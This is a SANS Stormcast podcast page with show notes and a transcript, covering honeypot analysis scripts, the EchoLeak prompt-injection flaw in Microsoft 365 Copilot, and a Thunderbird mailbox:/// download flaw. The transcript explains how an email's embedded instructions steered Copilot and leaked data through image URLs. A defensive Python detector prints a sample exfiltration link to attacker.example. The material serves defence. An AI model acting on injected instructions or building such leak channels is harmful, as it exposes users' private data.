
SANS Stormcast Friday, June 13th, 2025: Honeypot Scripts; EchoLeak MSFT Copilot Vuln; Thunderbird mailbox URL Vuln;

Direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9492.mp3


Automated Tools to Assist with DShield Honeypot Investigations
https://isc.sans.edu/diary/Automated%20Tools%20to%20Assist%20with%20DShield%20Honeypot%20Investigations%20%5BGuest%20Diary%5D/32038

EchoLeak: Zero-Click Microsoft 365 Copilot Data Leak
Microsoft fixed a vulnerability in Microsoft 365 Copilot that could have been abused to exfiltrate data from Copilot users without any user interaction. Copilot treated instructions an attacker had embedded in an email (written as if addressed to the user) as instructions to act on when it later retrieved that email, and the retrieved data was then leaked through image links in Copilot's response whose URLs carried the data.
https://www.aim.security/lp/aim-labs-echoleak-blogpost
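The exfiltration primitive described above, a response that carries retrieved data out in the URL of an image link, is something you can check for on the output side before the response is rendered. The following is an added example, not code from Aim Security, Microsoft, or this page: it scans an assistant's markdown response for image and link URLs, flags any whose host is outside an allowlist or whose URL carries tokens that also appear in the retrieved context, and strips the flagged ones. The response text, the retrieved context, the host attacker.example and the allowlist are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample (not from the original page): the text the assistant
# retrieved while answering, i.e. what an injected email could steer it to leak.
SAMPLE_CONTEXT = "The Q3 budget memo (ref 44-17) notes a headcount freeze."

# Constructed sample response: one image link smuggles context words out in a
# query parameter to an assumed attacker host, one image is a legitimate asset.
SAMPLE_RESPONSE = """Here is the summary you asked for.

The Q3 budget memo (ref 44-17) notes a headcount freeze.

![status](https://attacker.example/px.gif?d=budget%20memo%2044-17%20headcount%20freeze)
![logo](https://contoso.sharepoint.com/sites/hr/logo.png)
"""

# Assumed allowlist of hosts the renderer may fetch from (assumption for the example).
ALLOWED_HOSTS = {"contoso.sharepoint.com", "graph.microsoft.com"}

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")        # ![alt](url)
MD_LINK = re.compile(r"(?<!!)\[[^\]]*\]\(([^)\s]+)\)")    # [text](url), not preceded by !
TOKEN = re.compile(r"[A-Za-z0-9-]{4,}")


def extract_urls(markdown):
    """Return (kind, url) pairs for every markdown image and link in the response."""
    urls = [("image", m.group(1)) for m in MD_IMAGE.finditer(markdown)]
    urls += [("link", m.group(1)) for m in MD_LINK.finditer(markdown)]
    return urls


def find_exfil(markdown, allowed_hosts, context_text):
    """Flag URLs that leave the allowlist or carry words from the retrieved context."""
    context_words = {w.lower() for w in TOKEN.findall(context_text)}
    findings = []
    for kind, url in extract_urls(markdown):
        parts = urlsplit(url)
        host = parts.hostname or ""
        off_allowlist = host not in allowed_hosts
        # Decode path and query, then look for tokens that also occur in the context:
        # a URL that repeats retrieved data is the exfiltration channel described above.
        payload = unquote(parts.path + " " + parts.query)
        leaked = sorted({w for w in TOKEN.findall(payload) if w.lower() in context_words})
        if off_allowlist or leaked:
            findings.append({"kind": kind, "url": url, "host": host,
                             "off_allowlist": off_allowlist, "leaked_tokens": leaked})
    return findings


def sanitize(markdown, allowed_hosts, context_text):
    """Return the response with every flagged image/link replaced by a placeholder."""
    flagged = {f["url"] for f in find_exfil(markdown, allowed_hosts, context_text)}

    def repl(m):
        return "[link removed]" if m.group(1) in flagged else m.group(0)

    return MD_LINK.sub(repl, MD_IMAGE.sub(repl, markdown))


if __name__ == "__main__":
    for f in find_exfil(SAMPLE_RESPONSE, ALLOWED_HOSTS, SAMPLE_CONTEXT):
        print(f)
    print(sanitize(SAMPLE_RESPONSE, ALLOWED_HOSTS, SAMPLE_CONTEXT))
```

The allowlist check is the control that actually closes the channel; the token overlap check is only a detection aid, since an attacker can encode the data so that no context word survives intact.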

Thunderbird Vulnerability
Thunderbird users may be tricked into downloading arbitrary files if an email includes a mailbox:/// URL; opening such a link triggers an unsolicited download of whatever is referenced after the scheme.
https://www.mozilla.org/en-US/security/advisories/mfsa2025-49/
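A mail gateway or inbox rule can flag the trigger before Thunderbird ever renders it. The following is an added example and not part of the Mozilla advisory or this page: it parses a raw message, pulls every href and src out of the HTML parts (and bare mailbox: URLs out of plain-text parts) and reports those that use the mailbox scheme, recording whether the reference carries a host component, which distinguishes a local-path reference (mailbox:///...) from one naming a remote server (mailbox://host/...). The message, the addresses and the hostnames are constructed for the example.

```python
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample message (not from the advisory): one ordinary https link,
# one mailbox:/// link with a local path, one mailbox:// reference with a host.
SAMPLE_EML = b"""From: sender@example.test
To: victim@example.test
Subject: Invoice
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body>
<p>See the <a href="https://example.test/invoice.pdf">invoice</a>.</p>
<p><a href="mailbox:///tmp/invoice.pdf">open locally</a></p>
<p><img src="mailbox://files.example.test/share/logo.png"></p>
</body></html>
"""

PLAIN_MAILBOX = re.compile(r"mailbox:\S+", re.IGNORECASE)


class _RefCollector(HTMLParser):
    """Collect (tag, value) for every href/src attribute, in document order."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.refs.append((tag, value))


def mailbox_refs(raw_bytes):
    """Return every mailbox: scheme reference found in the message's text parts."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype not in ("text/html", "text/plain"):
            continue
        body = part.get_content()
        if ctype == "text/html":
            collector = _RefCollector()
            collector.feed(body)
            refs = collector.refs
        else:
            refs = [("text", m) for m in PLAIN_MAILBOX.findall(body)]
        for tag, value in refs:
            u = urlsplit(value.strip())
            if u.scheme.lower() != "mailbox":
                continue
            findings.append({"tag": tag, "url": value,
                             "host": u.netloc,   # empty for mailbox:///local/path
                             "path": u.path})
    return findings


def should_quarantine(raw_bytes):
    """Policy decision: any mailbox: reference in inbound mail is enough to hold it."""
    return len(mailbox_refs(raw_bytes)) > 0


if __name__ == "__main__":
    for f in mailbox_refs(SAMPLE_EML):
        print(f)
    print("quarantine:", should_quarantine(SAMPLE_EML))
```

Legitimate inbound mail has no reason to reference a mailbox: URL, so a blanket hold is a low-false-positive rule; the host field is kept in the finding so an analyst can see at a glance whether the reference points at a local file or at a remote name.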


Podcast Transcript

Hello and welcome to the Friday, June 13th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, and this episode, brought to you by the SANS.edu Undergraduate Certificate Program in Cybersecurity Fundamentals, is recorded in Jacksonville, Florida.

Well, in diaries today we have yet another diary by one of our undergraduate interns. This time William Constantino is looking into scripts that he wrote in order to summarize data from the DShield honeypot. Of course, we have shown scripts like this before, and when you're looking at the diary, I don't want you to look at it with the lens where you say, hey, how am I using this script for myself? I think what's sometimes more useful is to look at it and ask, how could I create a script like this, and which ideas from William's script may actually apply to my particular use case? So look at what kind of data William extracted from the honeypot here. Is this useful to you or not? And then also how some of the details were implemented in these scripts; that's, I think, a better way to look at it. Creating these scripts yourself sometimes has real educational value, not just with respect to learning how to script, but also sifting through data yourself, looking at some of the oddities in the data and such. You're really becoming way more familiar with the data as a result, and as a result also better at actually extracting useful artifacts from these logs.
So the way the attack works is that an attacker starts out by sending an email. That email now basically includes a command that it wants Copilot to execute. Now it's not directly addressed at Copilot; it's addressed at the user. But that's again where Copilot gets confused, and that's where the real issue happens, where now an attacker is able to basically control Copilot. The next part is then all about trying to exfiltrate the data, and that's done by actually inserting image links into the response. Part of the URL is then the data that's being exfiltrated. That also basically then requires taking advantage of a couple of other weaknesses in how these links are created and constrained. Interesting vulnerability, and yes, this particular issue has been fixed by Microsoft. But overall, of course, this is more one of those fundamental problems that probably exists in many similar systems.

And we've got an interesting vulnerability in Thunderbird. It's not the most critical vulnerability; I think they actually only rated it as medium, but I think it's also a good follow-up to yesterday's vulnerability in KDE with telnet links. This time it's mailbox links, so links starting with "mailbox", a colon, and then three slashes. This apparently triggers an unsolicited download of whatever document is then being listed after this mailbox colon protocol indicator. That can, first of all, be abused to basically just load a malicious PDF to the user's desktop. It can also be used to trick the system into reaching out via SMB, which then gets us back to the usual credential leakage. So a bunch of different options are available here. And it's something where I don't quite think that "medium" really covers it well. This is something where, again, the creativity of the attacker will have a large part in how this may potentially be exploited. And certainly don't forget to update Thunderbird if you're using it as your email client.
Well, and that's it for today. So thanks for listening. Thanks for any feedback that you have; please email it or send it to me via other means. And thanks for any good reviews that you'll leave on your favorite podcast platform. Next week, I will not have a podcast on Wednesday and Thursday due to some personal travel, but Monday, Tuesday, and Friday should just work as usual. So talk to you again on Monday. Bye.